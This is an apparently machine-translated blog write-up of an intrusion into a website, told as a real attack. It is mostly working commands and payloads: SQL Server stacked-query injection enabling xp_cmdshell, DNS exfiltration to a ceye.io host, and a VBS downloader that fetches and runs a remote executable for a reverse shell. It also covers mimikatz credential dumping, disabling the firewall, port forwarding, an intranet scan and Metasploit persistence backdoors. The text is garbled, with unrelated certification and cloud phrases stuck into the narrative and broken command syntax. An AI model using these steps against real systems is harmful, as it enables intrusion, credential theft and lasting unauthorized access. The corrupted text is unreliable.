A real infiltration battle

After a wave of directory scanning with dirsearch, nothing was found

directly using the IP access resolved by the domain name of the master station, it was found that the master station was attached with CDN

subdomains brute Scan the subdomain

one of the subdomains is not attached with CDN, so as to find the real IP of the website

after getting the real IP, nmap scan found that there is an unknown application on port 8099

access discovery is a web service, a login interface

while nmap is still working, it simply browses the functions of the website, which is pseudo static, and there is no movement in the whole website State function

so we microsoft azure fundamentals certification focus on the web service of port 8099 scanned by nmap

routine test of admin / Admin, prompt password error

l3yx / xxx, account does not exist

then we can be sure that the account and password verification here are separate, there is an admin account. And there is no verification code, it can explode in theory, but I only manually tested several common weak passwords, but to no avail.

When you enter a single quotation mark (admin '/ 123123), the surprise comes. There is sqli!

So I skillfully constructed the "universal password", admin / X 'or' x '='x --

and then reacted. Previous tests found that the account and password verification was separate, and the background account and password verification was certainly not where username = XXX anD password = XXX is a simple SQL statement, so continue to test and observe the error information

the verification of account password seems to call the stored procedure, such as execute @ result = verify 'xxx','xxx ';

when the account password is admin / 11', 'XX' -, the page returns to normal

because you are not familiar with SQL Server's use of stored procedure injection, if you want to try to construct a payload that can log in successfully, you have to change your thinking.

SQL server can stack queries by default, so as long as the previous statement is closed, any SQL statement can be executed later, and any SQL statement can be executed. Then, system commands can be executed by using stored procedures.

first, open the extended stored procedure with the following statement

exec sp_ configure 'show advanced options', 1;RECONFIGURE;EXEC sp_ configure 'xp_ Cmdshell ', 1; reconfigure;

execute system commands

exec Master.. XP_ Cmdshell "whoamI"

there will be no echo command execution result here, so ping command is used to judge the command execution result

here

Sometimes it's hard to execute a command without seeing the result. Here I still want to observe the result of the command execution and use the DNS out of band method. In fact, the following command is

CMD / V / C "whoamI > temp & & certutil - encode temp temp2 & & findstr / L / V" certificate "temp2 > temp3 & & set / P myvar = < temp3 & & set FINAL=!MYVAR!. xxx.ceye.io && nslookup ! final! "

during the actual test, we climbed a lot of holes. The current running directory may not have write permission. It seems that the target server does not have NSLOOKUP, but Ping

& these two characters must be encoded, otherwise they will be used as parameter separators by the web server

the generated temp file should be deleted, otherwise the next execution will fail

a pair of double references in SQL server The double quotation mark in the symbol is replaced by two double quotation marks

the last paylaod

exec Master.. XP_ cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";

exec master..xp_ cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!. xxx.ceye.io %26%26 ping !FINAL!""";

exec master..xp_ cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";

The direct reason is that the system permission

CMD command line can't download files, and it's easy to be intercepted by anti-virus software when using PowerShell, and it's not successful to test the PowerShell command on aws solutions this server, so VBS is used to download files

VBS download file script:

ilocal = lcase（ WScript.Arguments (1))

iRemote=LCase(WScript. Arguments(0))

Set xPost=CreateObject(" Microsoft.XMLHTTP ")

xPost.Open "GET",iRemote,0

xPost.Send ()

Set sGet=CreateObject(" ADODB.Stream ")

sGet.Mode=3

sGet.Type=1

sGet.Open ()

sGet.Write ( xPost.responseBody )

sGet.SaveToFile iLocal, 2

usage: cscript D / l.vbs http://xx.xx.xx.xx/x.exe D: / x.exe

so we have to use SQL injection execution command to write the script to the file, as follows

microsoft certification practice test

echo ilocal = lcase（ WScript.Arguments (1))>D:/l.vbs

echo iRemote=LCase( WScript.Arguments (0))>>D:/l.vbs

echo Set xPost=CreateObject("" Microsoft.XMLHTTP "")>>D:/l.vbs

echo xPost.Open ""GET"",iRemote,0 >>D:/l.vbs

echo xPost.Send () >>D:/l.vbs

echo Set sGet=CreateObject("" ADODB.Stream "")>>D:/l.vbs

echo sGet.Mode=3 >>D:/l.vbs

echo sGet.Type=1 >>D:/l.vbs

echo sGet.Open ()>>D:/l.vbs

echo sGet.Write ( xPost.responseBody )>>D:/l.vbs

echo sGet.SaveToFile iLocal, 2 > > D / l.vbs

note that the above commands can't be all input together by using the & connection, because the maximum length of the parameter is 128, and entering double quotation marks inside double quotation marks in SQL server requires entering two double quotation marks, not using the escape function, as shown in the figure

when executing cscript D / l.vbs http://ip/x.exe D:/x.exe After the command, you can see that the server does have a download record

indicating that the vbs script has been written successfully and the file has been downloaded, but the D / x.exe is executed Later, I didn't receive the shell. I suspected that it was the antivirus software that stopped me, but I did do free killing...

after checking, I found that the server was a 32-bit system, and I used a 64 bit payload, which naturally won't succeed. Later, I replaced it with a 32-bit one and successfully bounced back to the shell

< ipconfig

after checking the IP, I found thatIn the intranet

View domain users

net group / domain

there are Chinese garbled codes. Originally, I wanted to switch to UTF-8 code page with CHCP 65001, but as long as I switch to UTF-8 shell, it will break. I don't know the specific reason. But if UTF-8 doesn't work, CHCP 437 can switch to ibm437 English

it's a little disappointed to see that there is no domain here

< netstat - ano

< ARP -A

capture user hash

if the decryption is not successful, you can use mimikatz to capture plaintext directly. Metasploit is built-in, you can directly load

Load mimikatz

and then use Kerberos command to capture

or use mimikatz_ Command to execute the mimikatz command

mimikatz_ Command - F sekurlsa:: logonpasswords

target 3389 is not turned on, but win7, Win2003 and XP systems can be turned on with the following commands

reg add HKLM / system / currentcontrolSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_ DWORD / D 00000000 / F

close the firewall:

Netsh firewall set opmode Mode = disabled

after trying to close the firewall, the connection is still unsuccessful

the test found that port 3389 is still closed

it's stupid...

this server is in the intranet. If you want to connect naturally, first forward the port to the public network

Metasploit port forwarding:

portfwd add - L 3389 - P 3389 - R 192.168.50.2

this command forwards port 3389 (- P 3389) of the target (- R 192.168.50.2) to port 3389 (- L) of my server

then open the remote desktop connection, the IP is the public IP of my server, and the port is also set to 3389, so there is no need to change

to scan the target intranet, you need to add a route first

Run autoroute - s 192.168.50.2/24

scan the target intranet by using the portscan of MetasploitThe number of surviving hosts in Intranet is

use auxiliary / scanner / portscan / TCP

set rhosts 192.168.50.2/24set ports 139, 445

Expand

it's a bit slow. In the end, I gave up the metasploi metsvc module before I found other hosts in half of the scan

this is very simple to use

run Metsvc

actually opens a service for the target

to connect, use the expand / multi / handler module, and set the payload to windows / metsvc_ bind_ TCP, set the target IP and binding port 31337

metasploi persistence module

Run persistence - U - I 60 - P 5555 - R xx.xx.xx . XX

- U: set the backdoor to start automatically after the user logs in. In this way, the registry information will be added under HKCU / software / Microsoft / Windows / CurrentVersion / run.

- I: set the reverse connection interval, in seconds;

- P: set the port number of the reverse connection;

- R: set the IP address of the reverse connection.

the clearing script is shown in the figure below

To clear the backdoor, run the script in the meterpreter